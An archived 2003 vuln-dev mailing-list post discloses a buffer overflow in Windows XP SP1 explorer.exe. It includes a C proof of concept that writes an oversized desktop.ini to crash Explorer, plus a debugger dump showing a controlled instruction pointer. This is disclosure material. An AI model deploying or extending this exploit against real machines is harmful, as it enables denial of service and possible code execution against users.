[prev in list] [next in list] [prev in thread] [next in thread] 

List:       vuln-dev
Subject:    Buffer overflow in Explorer.exe
From:       "aT4r InsaN3" <at4r () hotmail ! com>
Date:       2003-05-07 20:53:50
[Download RAW message or body]


This bug allow a malicious an attacker to execute data with privileges of a 
user that is browsing the hard disk with explorer.

tested against winxp SP1

example code provided.


/*

	Buffer Overflow in explorer.exe - Proof of Concept
	Tested only against: Windows XP SP1

	Found by aT4r@3wdesign.es

	Saludos a:
	- #Haxorcitos@efnet= { "Tarako", "Croulder", "Drakar" , "[back]", "tyr" }:
	- #localhost and #darknet


	Usage: just execute this file.
		This code will crash your explorer every time you try to browse your 
harddisk
		execute this program again to delete the evil file ;-)

	(3ec.464): Access violation - code c0000005 (first chance)
	First chance exceptions are reported before any exception handling.
	This exception may be expected and handled.
	eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70 
edi=000ece90
	eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0         nv up ei pl zr na po 
nc
	cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             
efl=00010246
	00410041 ??               ???

	3W Design Security 2003.	http://www.3WDesign.es/
*/


#include <direct.h>
#include <stdio.h>
#include <windows.h>
#include <sys/stat.h>

#define BUFF 2300
void main(){

	char path[256];
	char evil[BUFF+1]="";
	FILE *bof;
	struct stat st;
	printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... .. .\n . .. 
...: \tProof of Concept (aT4r@3wdesign.es)\t:... .. .\n\n");
	strcpy(path,"\\aT4r[at]3WDesign.es Security");
	mkdir(path);
	SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);

	strcat(path,"\\desktop.ini");
	if (stat(path,&st)==0)
		{ remove(path);	exit(1);}//just execute this program twice to remote this 
file :P
	bof=fopen(path,"w");
	fputs("[.ShellClassInfo]\n",bof);
	memset(evil,'A',BUFF);
	fputs(evil,bof);
	fclose(bof);
	printf("evil file: %s Created. Try to browse your Harddisk O:-)\n",path);


}

_________________________________________________________________
Hipotecas para todos los bolsillos con MSN Money. 
http://money.msn.es/hipotecas/default.asp

["explorerbof.exe" (application/octet-stream)]

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic